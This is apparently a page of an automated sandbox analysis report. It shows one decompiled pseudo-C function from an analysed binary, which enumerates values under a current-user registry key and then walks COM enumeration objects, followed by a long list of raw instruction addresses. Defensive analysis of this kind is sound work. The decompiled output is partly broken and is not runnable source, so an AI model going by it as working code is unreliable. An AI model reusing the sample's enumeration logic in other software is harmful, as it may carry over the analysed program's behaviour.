                                                                                                                    • Instruction Fuzzy Hash: 7A412671E01B45DFDB10AF69DC4579CB7E0BF15326F20822CE5A9AB2D1C77498408F88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001DA77 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 361COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E0001DA77() {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				signed int _v24;
				void _v68;
				char _v88;
				char _v144;
				void _v148;
				char _v152;
				signed int _v156;
				void _v228;
				char _v1112;
				char _v1252;
				char _v2136;
				char _v3160;
				char _v4184;
				char _v5208;
				char _v6232;
				char _v6248;
				char _v6264;
				void* _v6268;
				void* _v6272;
				void* _v6276;
				char _v6280;
				void* _v6284;
				char _v6288;
				void* _v6292;
				char _v6400;
				char _v33252;
				char _v53252;
				char _v53268;
				char _v53284;
				void* _v53288;
				char _v53292;
				char _v53296;
				void* _v53300;
				short _v53304;
				char _v53308;
				intOrPtr _v53344;
				char _v53348;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t214;
				intOrPtr _t217;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr _t244;
				short* _t249;
				intOrPtr* _t250;
				signed int _t252;
				void* _t254;
				intOrPtr _t258;
				intOrPtr _t264;
				void* _t266;
				void* _t271;
				void* _t276;
				void* _t277;
				signed int _t283;
				intOrPtr* _t287;
				intOrPtr* _t291;
				void* _t295;
				intOrPtr* _t298;
				intOrPtr* _t305;
				char _t306;
				intOrPtr* _t307;
				intOrPtr* _t311;
				intOrPtr* _t313;
				void* _t332;
				char _t336;
				void* _t340;
				void* _t342;
				void* _t347;
				void* _t366;
				char* _t368;
				signed char _t381;
				void* _t392;
				intOrPtr _t395;
				void* _t400;
				void* _t401;
				void* _t402;
				intOrPtr _t403;
				void* _t404;
				intOrPtr* _t405;
				intOrPtr _t407;
				intOrPtr* _t412;
				intOrPtr* _t423;
				intOrPtr* _t427;
				intOrPtr* _t429;
				intOrPtr* _t458;
				void* _t463;
				void* _t465;
				void* _t466;
				short _t471;
				void* _t472;
				intOrPtr _t479;
				intOrPtr _t480;
				intOrPtr* _t481;
				void* _t482;
				char* _t483;
				void* _t486;
				intOrPtr* _t489;
				char* _t490;
				char* _t491;
				char* _t492;
				void* _t493;
				void* _t494;
				char* _t495;
				char* _t496;
				signed int _t497;
				signed int _t498;
				void* _t499;
				void* _t500;
				void* _t502;
				void* _t503;
				signed int _t504;
				void* _t505;
				void* _t508;
				void* _t509;
				void* _t510;
				void* _t511;

				E00077307(0xd060);
				_v8 =  *0x481f80 ^ _t497;
				memcpy( &_v68, 0x47058c, 0xe << 2);
				_t500 = _t499 + 0xc;
				asm("movsw");
				_push( &_v53296);
				_push(1);
				asm("movsb");
				_t471 = 0;
				_push(0);
				_push( &_v68);
				_push(0x80000001);
				_v53292 = 0x400;
				_v53304 = 0;
				if( *0x470028() != 0) {
					L60:
					_pop(_t472);
					_pop(_t486);
					return E000772F2(_t210, _t400, _v8 ^ _t497, _t460, _t472, _t486);
				} else {
					_t401 = 0;
					_v53292 = 0x400;
					_t214 =  *0x470000(_v53296, 0,  &_v1252,  &_v53292, 0, 0, 0, 0, _t400);
					if(_t214 != 0x103) {
						_t496 =  &_v33252;
						while(_t214 == 0) {
							_t458 =  &_v1252;
							_t460 = _t458 + 1;
							do {
								_t395 =  *_t458;
								_t458 = _t458 + 1;
							} while (_t395 != 0);
							if(_t458 - _t460 < 1) {
								L9:
								_t401 = _t401 + 1;
								_v53292 = 0x400;
								_t214 =  *0x470000(_v53296, _t401,  &_v1252,  &_v53292, 0, 0, 0, 0);
								if(_t214 != 0x103) {
									continue;
								}
							} else {
								if(_t471 < 0xfa) {
									E00077AF9(_t496, 0x80,  &_v1252);
									_t500 = _t500 + 0xc;
									_t471 = _t471 + 1;
									_t496 = _t496 - 0xffffff80;
									goto L9;
								}
							}
							break;
						}
						_v53304 = _t471;
					}
					_t210 =  *0x47002c(_v53296);
					if(_t471 < 1) {
						L59:
						_pop(_t400);
						goto L60;
					} else {
						_t402 = 0x47f000;
						do {
							E0001BBD7(_t460, _t402,  &_v1252, 0x3e8);
							_t412 =  &_v1252;
							_t500 = _t500 + 0xc;
							_t460 = _t412 + 1;
							do {
								_t217 =  *_t412;
								_t412 = _t412 + 1;
							} while (_t217 != 0);
							if(_t412 - _t460 >= 1 && _t471 != 0) {
								_t495 =  &_v33252;
								do {
									_t392 = E000780AD( &_v1252, _t495);
									_t500 = _t500 + 8;
									if(_t392 == 0) {
										E0001CA87(_t460,  &_v1252, _t402);
										_t500 = _t500 + 8;
									}
									_t495 = _t495 - 0xffffff80;
									_t471 = _t471 - 1;
								} while (_t471 != 0);
								_t471 = _v53304;
							}
							_t402 = _t402 + 0x200;
						} while (_t402 < 0x481600);
						memcpy( &_v148, 0x4705d0, 0x13 << 2);
						asm("movsw");
						memcpy( &_v228, 0x470620, 0x13 << 2);
						_t502 = _t500 + 0x18;
						_v53288 = 0;
						asm("movsw");
						 *0x470214(0);
						_t489 =  *0x470210;
						 *_t489( &_v148,  &_v53268);
						 *_t489( &_v228,  &_v53284);
						_push( &_v53288);
						_push( &_v53284);
						_push(1);
						_push(0);
						_push( &_v53268);
						if( *0x47020c() < 0) {
							L58:
							_t210 =  *0x470208();
							goto L59;
						} else {
							_t231 = _v53288;
							_t460 =  &_v53300;
							_push( &_v53300);
							_push(_t231);
							if( *((intOrPtr*)( *_t231 + 0x1c))() < 0) {
								L57:
								_t233 = _v53288;
								 *((intOrPtr*)( *_t233 + 8))(_t233);
								goto L58;
							} else {
								_t235 = _v53300;
								_push( &_v53308);
								_t460 =  &_v53348;
								_push( &_v53348);
								_push(1);
								_push(_t235);
								if( *((intOrPtr*)( *_t235 + 0xc))() != 0) {
									L56:
									_t237 = _v53300;
									 *((intOrPtr*)( *_t237 + 8))(_t237);
									goto L57;
								} else {
									_t403 = _v53304;
									do {
										_t239 = _v53344;
										if(_v53344 == 0) {
											goto L55;
										} else {
											E00078804( &_v53252, 0x2710, _t239);
											_t423 =  &_v53252;
											_t503 = _t502 + 0xc;
											_t463 = _t423 + 2;
											do {
												_t244 =  *_t423;
												_t423 = _t423 + 2;
											} while (_t244 != 0);
											E00078B83( &_v53252, (_t423 - _t463 >> 1) + 1);
											_push(0x3f);
											_push( &_v53252);
											_t249 = E00078756(_t423 - _t463 >> 1);
											_t504 = _t503 + 0x10;
											if(_t249 != 0) {
												 *_t249 = 0;
											}
											_t250 =  &_v53252;
											_t464 = _t250 + 2;
											do {
												_t426 =  *_t250;
												_t250 = _t250 + 2;
											} while (_t426 != 0);
											_t252 = _t250 - _t464 >> 1;
											if( *((short*)(_t497 + _t252 * 2 - 0xd002)) != 0x2f) {
												L37:
												_t254 = E00078860(_t426,  &_v53252, 0x470670, 7);
												_t505 = _t504 + 0xc;
												if(_t254 == 0) {
													L39:
													E0001BBD7(_t464,  &_v53252,  &_v1252, 0x3e8);
													_t427 =  &_v1252;
													_t502 = _t505 + 0xc;
													_t465 = _t427 + 1;
													do {
														_t258 =  *_t427;
														_t427 = _t427 + 1;
													} while (_t258 != 0);
													if(_t427 - _t465 >= 1) {
														if(_t403 != 0) {
															_t491 =  &_v33252;
															_t480 = _t403;
															do {
																_t271 = E000780AD( &_v1252, _t491);
																_t502 = _t502 + 8;
																if(_t271 == 0) {
																	E0001CA87(_t465,  &_v1252,  &_v53252);
																	_t502 = _t502 + 8;
																}
																_t491 = _t491 - 0xffffff80;
																_t480 = _t480 - 1;
															} while (_t480 != 0);
														}
														E000786EA( &_v53252, 0x2710, 0x470694);
														E0001BBD7(_t465,  &_v53252,  &_v1252, 0x3e8);
														_t429 =  &_v1252;
														_t502 = _t502 + 0x18;
														_t466 = _t429 + 1;
														do {
															_t264 =  *_t429;
															_t429 = _t429 + 1;
														} while (_t264 != 0);
														if(_t429 - _t466 >= 1 && _t403 != 0) {
															_t490 =  &_v33252;
															_t479 = _t403;
															do {
																_t266 = E000780AD( &_v1252, _t490);
																_t502 = _t502 + 8;
																if(_t266 == 0) {
																	E0001CA87(_t466,  &_v1252,  &_v53252);
																	_t502 = _t502 + 8;
																}
																_t490 = _t490 - 0xffffff80;
																_t479 = _t479 - 1;
															} while (_t479 != 0);
														}
													}
												} else {
													_t276 = E00078860(_t426,  &_v53252, 0x470680, 8);
													_t502 = _t505 + 0xc;
													if(_t276 == 0) {
														goto L39;
													}
												}
												goto L55;
											} else {
												_t277 = _t252 * 2 - 2;
												if(_t277 >= 0x4e20) {
													L00077EEC();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t498 = _t504;
													E00077307(0x1880);
													_t283 =  *0x481f80 ^ _t498;
													_v156 = _t283;
													 *[fs:0x0] =  &_v152;
													_v6400 = 0;
													_v144 = 0;
													_t492 =  *0x4700f4(0x470520, _t283, _t480, _t491, _t403,  *[fs:0x0], 0x46fccc, 0xffffffff, _t497);
													if(_t492 != 0) {
														_t481 =  *0x470110(_t492, 0x47052c);
														if(_t481 != 0) {
															_t287 = _v6268;
															if(_t287 != 0) {
																 *((intOrPtr*)( *_t287 + 8))(_t287);
															}
															_push(0);
															_push(0);
															_push(0);
															_push( &_v6268);
															_v6268 = 0;
															if( *_t481() < 0) {
																goto L66;
															} else {
																_t483 = _v6268;
																_v12 = 1;
																_v6272 = 0;
																if(_t483 == 0) {
																	L71:
																	E0008A287(0x80004003);
																}
																_push( &_v6272);
																_push(0);
																_push(0);
																_push(_t483);
																if( *((intOrPtr*)( *_t483 + 0x38))() >= 0) {
																	_t295 = _v6272;
																	if(_t295 == 0) {
																		goto L71;
																	} else {
																		_t405 =  *0x470100;
																		while(1) {
																			_push(0);
																			_t464 =  &_v6248;
																			_push( &_v6248);
																			_push(1);
																			_push(_t295);
																			if( *((intOrPtr*)( *_t295 + 0xc))() != 0) {
																				break;
																			}
																			asm("movq xmm0, [ebp-0x1860]");
																			_push(0x470544);
																			asm("movq [eax], xmm0");
																			asm("movq xmm0, [ebp-0x1858]");
																			asm("movq [eax+0x8], xmm0");
																			_push(0x400);
																			_push( &_v5208);
																			E00077C60();
																			_t504 = _t504 - 0x10 + 0x1c;
																			_t492 = _v6268;
																			_v12 = 2;
																			_v6284 = 0;
																			if(_t492 == 0) {
																				goto L71;
																			} else {
																				_push( &_v6284);
																				_push(0);
																				_push( &_v6248);
																				_push(0);
																				_push(_t492);
																				if( *((intOrPtr*)( *_t492 + 0x3c))() >= 0) {
																					while(1) {
																						_t305 = _v6284;
																						if(_t305 == 0) {
																							goto L71;
																						}
																						_t464 =  &_v6264;
																						_t306 =  *((intOrPtr*)( *_t305 + 0xc))(_t305, 1,  &_v6264, 0);
																						if(_t306 != 0) {
																							goto L81;
																						} else {
																							_t492 = _v6268;
																							_v12 = 3;
																							_v6276 = _t306;
																							if(_t492 == 0) {
																								goto L71;
																							} else {
																								_push( &_v6276);
																								_push(0);
																								_push( &_v6264);
																								_push( &_v6248);
																								_push(0);
																								_push(_t492);
																								if( *((intOrPtr*)( *_t492 + 0x54))() >= 0) {
																									while(1) {
																										L93:
																										_t311 = _v6276;
																										if(_t311 == 0) {
																											goto L71;
																										}
																										_push(0);
																										_t464 =  &_v6288;
																										_push( &_v6288);
																										_push(1);
																										_push(_t311);
																										if( *((intOrPtr*)( *_t311 + 0xc))() != 0) {
																											goto L90;
																										} else {
																											E00077C87( &_v1112, _t312, 0x400);
																											E00077C87( &_v2136, 0, 0x400);
																											E00077C87( &_v4184, 0, 0x400);
																											E00077C87( &_v3160, 0, 0x400);
																											E00077C60( &_v1112, 0x400, 0x470548, _v6288);
																											E00077AF9( &_v6232, 0x400,  &_v1112);
																											E00078317( &_v6232, 0x400);
																											_t492 = _v6268;
																											_t504 = _t504 + 0x54;
																											_v6292 = 0;
																											_v6280 = 0;
																											if(_t492 == 0) {
																												goto L71;
																											} else {
																												_push(0);
																												_push(0);
																												_push( &_v6280);
																												_push( &_v6292);
																												_push(_v6288);
																												_push( &_v6264);
																												_push( &_v6248);
																												_push(0);
																												_push(_t492);
																												if( *((intOrPtr*)( *_t492 + 0x44))() >= 0) {
																													_t332 =  *0x4700f8(_v6280);
																													_t483 = _v6292;
																													if(_t332 >= _t483 - 1) {
																														E00077C60( &_v2136, 0x400, 0x470310, _v6280);
																														_t504 = _t504 + 0x10;
																														goto L106;
																													} else {
																														_t494 = 0;
																														_t464 = 0;
																														if(_t483 != 0) {
																															_t407 = _v6280;
																															do {
																																_t381 =  *((intOrPtr*)(_t464 + _t407));
																																_t455 =  ==  ? 0x2c : _t381 & 0x000000ff;
																																 *((char*)(_t498 + _t494 - 0x850)) =  ==  ? 0x2c : _t381 & 0x000000ff;
																																_t464 = _t464 + 2;
																																_t494 = _t494 + 1;
																															} while (_t464 < _t483);
																															_t405 =  *0x470100;
																														}
																														_t492 = _t494 - 1;
																														if(_t492 >= 0x400) {
																															L00077EEC();
																															goto L122;
																														} else {
																															 *((char*)(_t498 + _t492 - 0x850)) = 0;
																															L106:
																															_t336 =  *_t405( &_v5208, 0x47054c);
																															if(_t336 == 0) {
																																_v3160 = _t336;
																																_t492 = E00078487( &_v2136, 0x470558);
																																_t511 = _t504 + 8;
																																if(_t492 != 0) {
																																	E00077AF9( &_v3160, 0x400, _t492 + 1);
																																	 *_t492 = 0;
																																	E00077AF9( &_v4184, 0x400,  &_v2136);
																																	_t511 = _t511 + 0x18;
																																}
																																L0001EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																_t504 = _t511 + 0x10;
																															}
																															_push(0x47055c);
																															_push( &_v5208);
																															if( *_t405() != 0) {
																																continue;
																															} else {
																																_t340 = E00078487( &_v1112, 0x470568);
																																_t504 = _t504 + 8;
																																if(_t340 != 0) {
																																	continue;
																																} else {
																																	_t342 = E00078487( &_v1112, 0x470574);
																																	_t508 = _t504 + 8;
																																	if(_t342 != 0) {
																																		_t368 = E00078487( &_v1112, 0x470574);
																																		_t508 = _t508 + 8;
																																		 *_t368 = 0;
																																	}
																																	 *0x4700fc( &_v88,  &_v1112, 8);
																																	_t347 = E00078487( &_v88, 0x47057c);
																																	_t509 = _t508 + 8;
																																	if(_t347 != 0) {
																																		L116:
																																		_t483 =  &_v2136;
																																		_t492 = E000771C7(_t483, 0x2c);
																																		_t504 = _t509 + 8;
																																		if(_t492 == 0) {
																																			continue;
																																		} else {
																																			while(1) {
																																				 *_t492 = 0;
																																				E00077AF9( &_v4184, 0x400, _t483);
																																				_t406 = _t492 + 1;
																																				_t483 = E000771C7(_t492 + 1, 0x2c);
																																				_t510 = _t504 + 0x14;
																																				if(_t483 == 0) {
																																					break;
																																				}
																																				 *_t483 = 0;
																																				E00077AF9( &_v3160, 0x400, _t406);
																																				L0001EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																				_t483 = _t483 + 1;
																																				_t492 = E000771C7(_t483, 0x2c);
																																				_t504 = _t510 + 0x24;
																																				if(_t492 != 0) {
																																					continue;
																																				} else {
																																					L92:
																																					_t405 =  *0x470100;
																																					goto L93;
																																				}
																																				goto L123;
																																			}
																																			_t492 = _t492 + 1;
																																			E00077AF9( &_v3160, 0x400, _t492);
																																			L0001EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																			_t504 = _t510 + 0x1c;
																																			goto L92;
																																		}
																																	} else {
																																		_t366 = E00078487( &_v88, 0x470584);
																																		_t504 = _t509 + 8;
																																		if(_t366 == 0) {
																																			continue;
																																		} else {
																																			goto L116;
																																		}
																																	}
																																}
																															}
																															goto L126;
																														}
																													}
																												} else {
																													E0008A2A7( &_v6248, _t331, _t492, 0x470300);
																													continue;
																												}
																											}
																										}
																										goto L123;
																									}
																									goto L71;
																								} else {
																									E0008A2A7( &_v6248, _t310, _t492, 0x470300);
																									L90:
																									_t313 = _v6276;
																									_v12 = 2;
																									if(_t313 != 0) {
																										 *((intOrPtr*)( *_t313 + 8))(_t313);
																									}
																									continue;
																								}
																							}
																						}
																						goto L123;
																					}
																					goto L71;
																				} else {
																					E0008A2A7( &_v6248, _t304, _t492, 0x470300);
																					L81:
																					_t307 = _v6284;
																					_v12 = 1;
																					if(_t307 != 0) {
																						 *((intOrPtr*)( *_t307 + 8))(_t307);
																					}
																					_t295 = _v6272;
																					if(_t295 != 0) {
																						continue;
																					} else {
																						goto L71;
																					}
																				}
																			}
																			goto L123;
																		}
																		L122:
																		_t298 = _v6272;
																		_v12 = 0;
																		if(_t298 != 0) {
																			goto L74;
																		}
																	}
																} else {
																	E0008A2A7( &_v6272, _t294, _t483, 0x470300);
																	 *0x470114(_t492);
																	_t298 = _v6272;
																	_v12 = 0;
																	if(_t298 != 0) {
																		L74:
																		 *((intOrPtr*)( *_t298 + 8))(_t298);
																	}
																}
															}
														} else {
															 *0x470124();
															L66:
															 *0x470114(_t492);
														}
													} else {
														 *0x470124();
													}
													L123:
													_t291 = _v6268;
													_v12 = 0xffffffff;
													if(_t291 != 0) {
														_t291 =  *((intOrPtr*)( *_t291 + 8))(_t291);
													}
													 *[fs:0x0] = _v20;
													_pop(_t482);
													_pop(_t493);
													_pop(_t404);
													return E000772F2(_t291, _t404, _v24 ^ _t498, _t464, _t482, _t493);
												} else {
													_t426 = 0;
													 *((short*)(_t497 + _t277 - 0xd000)) = 0;
													goto L37;
												}
											}
										}
										goto L126;
										L55:
										_t240 = _v53300;
										_push( &_v53308);
										_t460 =  &_v53348;
										_push( &_v53348);
										_push(1);
										_push(_t240);
									} while ( *((intOrPtr*)( *_t240 + 0xc))() == 0);
									goto L56;
								}
							}
						}
					}
				}
				L126:
			}































































































































                                                                                                                    0x0001da7f
                                                                                                                    0x0001da8b
                                                                                                                    0x0001da9d
                                                                                                                    0x0001da9d
                                                                                                                    0x0001da9f
                                                                                                                    0x0001daa7
                                                                                                                    0x0001daa8
                                                                                                                    0x0001daaa
                                                                                                                    0x0001daab
                                                                                                                    0x0001daad
                                                                                                                    0x0001dab1
                                                                                                                    0x0001dab2
                                                                                                                    0x0001dab7
                                                                                                                    0x0001dac1
                                                                                                                    0x0001dacf
                                                                                                                    0x0001df0a
                                                                                                                    0x0001df0d
                                                                                                                    0x0001df10
                                                                                                                    0x0001df19
                                                                                                                    0x0001dad5
                                                                                                                    0x0001dad6
                                                                                                                    0x0001daf1
                                                                                                                    0x0001dafb
                                                                                                                    0x0001db06
                                                                                                                    0x0001db08
                                                                                                                    0x0001db0e
                                                                                                                    0x0001db12
                                                                                                                    0x0001db18
                                                                                                                    0x0001db1b
                                                                                                                    0x0001db1b
                                                                                                                    0x0001db1d
                                                                                                                    0x0001db1e
                                                                                                                    0x0001db27
                                                                                                                    0x0001db4a
                                                                                                                    0x0001db60
                                                                                                                    0x0001db68
                                                                                                                    0x0001db72
                                                                                                                    0x0001db7d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001db29
                                                                                                                    0x0001db2f
                                                                                                                    0x0001db3e
                                                                                                                    0x0001db43
                                                                                                                    0x0001db46
                                                                                                                    0x0001db47
                                                                                                                    0x00000000
                                                                                                                    0x0001db47
                                                                                                                    0x0001db2f
                                                                                                                    0x00000000
                                                                                                                    0x0001db27
                                                                                                                    0x0001db7f
                                                                                                                    0x0001db7f
                                                                                                                    0x0001db8b
                                                                                                                    0x0001db94
                                                                                                                    0x0001df09
                                                                                                                    0x0001df09
                                                                                                                    0x00000000
                                                                                                                    0x0001db9a
                                                                                                                    0x0001db9a
                                                                                                                    0x0001dba7
                                                                                                                    0x0001dbb4
                                                                                                                    0x0001dbb9
                                                                                                                    0x0001dbbf
                                                                                                                    0x0001dbc2
                                                                                                                    0x0001dbc7
                                                                                                                    0x0001dbc7
                                                                                                                    0x0001dbc9
                                                                                                                    0x0001dbca
                                                                                                                    0x0001dbd3
                                                                                                                    0x0001dbd9
                                                                                                                    0x0001dbdf
                                                                                                                    0x0001dbe7
                                                                                                                    0x0001dbec
                                                                                                                    0x0001dbf1
                                                                                                                    0x0001dbfb
                                                                                                                    0x0001dc00
                                                                                                                    0x0001dc00
                                                                                                                    0x0001dc03
                                                                                                                    0x0001dc06
                                                                                                                    0x0001dc06
                                                                                                                    0x0001dc09
                                                                                                                    0x0001dc09
                                                                                                                    0x0001dc0f
                                                                                                                    0x0001dc15
                                                                                                                    0x0001dc2d
                                                                                                                    0x0001dc2f
                                                                                                                    0x0001dc41
                                                                                                                    0x0001dc41
                                                                                                                    0x0001dc45
                                                                                                                    0x0001dc4f
                                                                                                                    0x0001dc51
                                                                                                                    0x0001dc57
                                                                                                                    0x0001dc6b
                                                                                                                    0x0001dc7b
                                                                                                                    0x0001dc83
                                                                                                                    0x0001dc8a
                                                                                                                    0x0001dc8b
                                                                                                                    0x0001dc8d
                                                                                                                    0x0001dc95
                                                                                                                    0x0001dc9e
                                                                                                                    0x0001df03
                                                                                                                    0x0001df03
                                                                                                                    0x00000000
                                                                                                                    0x0001dca4
                                                                                                                    0x0001dca4
                                                                                                                    0x0001dcaa
                                                                                                                    0x0001dcb2
                                                                                                                    0x0001dcb3
                                                                                                                    0x0001dcb9
                                                                                                                    0x0001def7
                                                                                                                    0x0001def7
                                                                                                                    0x0001df00
                                                                                                                    0x00000000
                                                                                                                    0x0001dcbf
                                                                                                                    0x0001dcbf
                                                                                                                    0x0001dccd
                                                                                                                    0x0001dcce
                                                                                                                    0x0001dcd4
                                                                                                                    0x0001dcd5
                                                                                                                    0x0001dcd7
                                                                                                                    0x0001dcdd
                                                                                                                    0x0001deeb
                                                                                                                    0x0001deeb
                                                                                                                    0x0001def4
                                                                                                                    0x00000000
                                                                                                                    0x0001dce3
                                                                                                                    0x0001dce3
                                                                                                                    0x0001dce9
                                                                                                                    0x0001dce9
                                                                                                                    0x0001dcf1
                                                                                                                    0x00000000
                                                                                                                    0x0001dcf7
                                                                                                                    0x0001dd04
                                                                                                                    0x0001dd09
                                                                                                                    0x0001dd0f
                                                                                                                    0x0001dd12
                                                                                                                    0x0001dd17
                                                                                                                    0x0001dd17
                                                                                                                    0x0001dd1a
                                                                                                                    0x0001dd1d
                                                                                                                    0x0001dd31
                                                                                                                    0x0001dd3c
                                                                                                                    0x0001dd3e
                                                                                                                    0x0001dd3f
                                                                                                                    0x0001dd44
                                                                                                                    0x0001dd49
                                                                                                                    0x0001dd4d
                                                                                                                    0x0001dd4d
                                                                                                                    0x0001dd50
                                                                                                                    0x0001dd56
                                                                                                                    0x0001dd59
                                                                                                                    0x0001dd59
                                                                                                                    0x0001dd5c
                                                                                                                    0x0001dd5f
                                                                                                                    0x0001dd66
                                                                                                                    0x0001dd71
                                                                                                                    0x0001dd8f
                                                                                                                    0x0001dd9d
                                                                                                                    0x0001dda2
                                                                                                                    0x0001dda7
                                                                                                                    0x0001ddc7
                                                                                                                    0x0001ddda
                                                                                                                    0x0001dddf
                                                                                                                    0x0001dde5
                                                                                                                    0x0001dde8
                                                                                                                    0x0001ddeb
                                                                                                                    0x0001ddeb
                                                                                                                    0x0001dded
                                                                                                                    0x0001ddee
                                                                                                                    0x0001ddf7
                                                                                                                    0x0001ddff
                                                                                                                    0x0001de01
                                                                                                                    0x0001de07
                                                                                                                    0x0001de09
                                                                                                                    0x0001de11
                                                                                                                    0x0001de16
                                                                                                                    0x0001de1b
                                                                                                                    0x0001de2b
                                                                                                                    0x0001de30
                                                                                                                    0x0001de30
                                                                                                                    0x0001de33
                                                                                                                    0x0001de36
                                                                                                                    0x0001de36
                                                                                                                    0x0001de09
                                                                                                                    0x0001de4a
                                                                                                                    0x0001de62
                                                                                                                    0x0001de67
                                                                                                                    0x0001de6d
                                                                                                                    0x0001de70
                                                                                                                    0x0001de77
                                                                                                                    0x0001de77
                                                                                                                    0x0001de79
                                                                                                                    0x0001de7a
                                                                                                                    0x0001de83
                                                                                                                    0x0001de89
                                                                                                                    0x0001de8f
                                                                                                                    0x0001de97
                                                                                                                    0x0001de9f
                                                                                                                    0x0001dea4
                                                                                                                    0x0001dea9
                                                                                                                    0x0001deb9
                                                                                                                    0x0001debe
                                                                                                                    0x0001debe
                                                                                                                    0x0001dec1
                                                                                                                    0x0001dec4
                                                                                                                    0x0001dec4
                                                                                                                    0x0001de97
                                                                                                                    0x0001de83
                                                                                                                    0x0001dda9
                                                                                                                    0x0001ddb7
                                                                                                                    0x0001ddbc
                                                                                                                    0x0001ddc1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001ddc1
                                                                                                                    0x00000000
                                                                                                                    0x0001dd73
                                                                                                                    0x0001dd73
                                                                                                                    0x0001dd7f
                                                                                                                    0x0001df1a
                                                                                                                    0x0001df1f
                                                                                                                    0x0001df20
                                                                                                                    0x0001df21
                                                                                                                    0x0001df22
                                                                                                                    0x0001df23
                                                                                                                    0x0001df24
                                                                                                                    0x0001df25
                                                                                                                    0x0001df26
                                                                                                                    0x0001df28
                                                                                                                    0x0001df3d
                                                                                                                    0x0001df47
                                                                                                                    0x0001df49
                                                                                                                    0x0001df53
                                                                                                                    0x0001df59
                                                                                                                    0x0001df68
                                                                                                                    0x0001df75
                                                                                                                    0x0001df79
                                                                                                                    0x0001df92
                                                                                                                    0x0001df96
                                                                                                                    0x0001dfaa
                                                                                                                    0x0001dfb2
                                                                                                                    0x0001dfb7
                                                                                                                    0x0001dfb7
                                                                                                                    0x0001dfba
                                                                                                                    0x0001dfbc
                                                                                                                    0x0001dfbe
                                                                                                                    0x0001dfc6
                                                                                                                    0x0001dfc7
                                                                                                                    0x0001dfd5
                                                                                                                    0x00000000
                                                                                                                    0x0001dfd7
                                                                                                                    0x0001dfd7
                                                                                                                    0x0001dfdd
                                                                                                                    0x0001dfe1
                                                                                                                    0x0001dfed
                                                                                                                    0x0001dfef
                                                                                                                    0x0001dff4
                                                                                                                    0x0001dff4
                                                                                                                    0x0001e001
                                                                                                                    0x0001e002
                                                                                                                    0x0001e004
                                                                                                                    0x0001e006
                                                                                                                    0x0001e00c
                                                                                                                    0x0001e03e
                                                                                                                    0x0001e046
                                                                                                                    0x00000000
                                                                                                                    0x0001e048
                                                                                                                    0x0001e048
                                                                                                                    0x0001e057
                                                                                                                    0x0001e059
                                                                                                                    0x0001e05b
                                                                                                                    0x0001e061
                                                                                                                    0x0001e062
                                                                                                                    0x0001e064
                                                                                                                    0x0001e06a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e070
                                                                                                                    0x0001e07d
                                                                                                                    0x0001e082
                                                                                                                    0x0001e086
                                                                                                                    0x0001e08e
                                                                                                                    0x0001e099
                                                                                                                    0x0001e09e
                                                                                                                    0x0001e09f
                                                                                                                    0x0001e0a4
                                                                                                                    0x0001e0a7
                                                                                                                    0x0001e0ad
                                                                                                                    0x0001e0b1
                                                                                                                    0x0001e0bd
                                                                                                                    0x00000000
                                                                                                                    0x0001e0c3
                                                                                                                    0x0001e0cb
                                                                                                                    0x0001e0cc
                                                                                                                    0x0001e0d4
                                                                                                                    0x0001e0d5
                                                                                                                    0x0001e0d7
                                                                                                                    0x0001e0dd
                                                                                                                    0x0001e117
                                                                                                                    0x0001e117
                                                                                                                    0x0001e11f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e129
                                                                                                                    0x0001e133
                                                                                                                    0x0001e138
                                                                                                                    0x00000000
                                                                                                                    0x0001e13a
                                                                                                                    0x0001e13a
                                                                                                                    0x0001e140
                                                                                                                    0x0001e144
                                                                                                                    0x0001e14c
                                                                                                                    0x00000000
                                                                                                                    0x0001e152
                                                                                                                    0x0001e15a
                                                                                                                    0x0001e15b
                                                                                                                    0x0001e163
                                                                                                                    0x0001e16a
                                                                                                                    0x0001e16b
                                                                                                                    0x0001e16d
                                                                                                                    0x0001e173
                                                                                                                    0x0001e1a7
                                                                                                                    0x0001e1a7
                                                                                                                    0x0001e1a7
                                                                                                                    0x0001e1af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e1b7
                                                                                                                    0x0001e1b9
                                                                                                                    0x0001e1bf
                                                                                                                    0x0001e1c0
                                                                                                                    0x0001e1c2
                                                                                                                    0x0001e1c8
                                                                                                                    0x00000000
                                                                                                                    0x0001e1ca
                                                                                                                    0x0001e1d7
                                                                                                                    0x0001e1ea
                                                                                                                    0x0001e1fd
                                                                                                                    0x0001e210
                                                                                                                    0x0001e22c
                                                                                                                    0x0001e247
                                                                                                                    0x0001e258
                                                                                                                    0x0001e25d
                                                                                                                    0x0001e263
                                                                                                                    0x0001e266
                                                                                                                    0x0001e270
                                                                                                                    0x0001e27c
                                                                                                                    0x00000000
                                                                                                                    0x0001e282
                                                                                                                    0x0001e284
                                                                                                                    0x0001e286
                                                                                                                    0x0001e28e
                                                                                                                    0x0001e295
                                                                                                                    0x0001e296
                                                                                                                    0x0001e2a2
                                                                                                                    0x0001e2a9
                                                                                                                    0x0001e2aa
                                                                                                                    0x0001e2ac
                                                                                                                    0x0001e2b2
                                                                                                                    0x0001e2cb
                                                                                                                    0x0001e2d1
                                                                                                                    0x0001e2dc
                                                                                                                    0x0001e33f
                                                                                                                    0x0001e344
                                                                                                                    0x00000000
                                                                                                                    0x0001e2de
                                                                                                                    0x0001e2de
                                                                                                                    0x0001e2e0
                                                                                                                    0x0001e2e4
                                                                                                                    0x0001e2e6
                                                                                                                    0x0001e2ec
                                                                                                                    0x0001e2ec
                                                                                                                    0x0001e2f9
                                                                                                                    0x0001e2fc
                                                                                                                    0x0001e303
                                                                                                                    0x0001e306
                                                                                                                    0x0001e307
                                                                                                                    0x0001e30b
                                                                                                                    0x0001e30b
